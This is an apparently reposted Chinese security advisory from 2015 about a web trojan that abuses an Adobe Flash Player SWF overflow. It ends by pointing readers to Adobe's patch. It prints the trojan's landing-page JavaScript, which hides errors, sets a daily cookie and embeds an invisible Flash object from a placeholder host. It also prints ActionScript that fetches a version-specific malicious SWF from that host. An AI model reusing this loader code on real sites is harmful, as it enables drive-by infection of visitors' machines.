FLASH网马官方补丁

当前位置 : 首页 > 实用技巧 > 漏洞研究 > FLASH网马官方补丁

FLASH网马官方补丁

来源:互联网 作者:脚本宝典 时间:2015-07-26 18:34
最近几天拦截到利用AdobeFlashPlayerSWF文件漏洞的网马,该网马通过网页加载一个正常的FLASH文件,再在那个FLASH文件里调用嵌入恶意构造的FLASH文件,这时会导致溢出,从而可能执行任意指

最近几天拦截到利用Adobe Flash Player SWF文件漏洞的网马,该网马通过网页加载一个正常的FLASH文件,再在那个FLASH文件里调用嵌入恶意构造的FLASH文件,这时会导致溢出,从而可能执行任意指令。以下为调用页内容: 


<script> 
window.onerror=function(){return true;} 
function init(){window.status=”";}window.onload = init; 
if(document.cookie.indexOf(”play=”)==-1){ 
var expires=new Date(); 
expires.setTime(expires.getTime()+24*60*60*1000); 
document.cookie=”play=Yes;path=/;expires=”+expires.toGMTString(); 
if(navigator.userAgent.toLowerCase().indexOf(”msie”)>0) 

document.write('<object classid=”clsid:d27cdb6e-ae6d-11cf-96b8-444553540000″ codebase=”http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0″ width=”0″ height=”0″ align=”middle”>'); 
document.write('<param name=”allowScriptAccess” value=”sameDomain”/>'); 
document.write('<param name=”movie” value=”http://www.XXX.cn/flash/XX.swf”/>'); 
document.write('<param name=”quality” value=”high”/>'); 
document.write('<param name=”bgcolor” value=”#ffffff”/>'); 
document.write('<embed src=”http://www.XXX.cn/flash/XX.swf” src=”http://www.XXX.cn/flash/XX.swf”/>'); 
document.write('</object>'); 
}else 
{document.write(”<EMBED src=http://www.XXX.cn/flash/XX.swf width=0 height=0>”);}} 
</script>  以下为正常的FLASH文件使用的脚本: 

// Action script…// [Action in Frame 1] 
var flashVersion =/hxversion; 
loadMovie(”http://www.XXX.cn/flash/” + flashVersion + “mal_swf.swf”, _root); 
stop(); 
该恶意FLASH部分内容如下: 


建议: 
厂商补丁: Adobe 
—– 
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.adobe.com/go/getflash 

Tag:
网友评论

<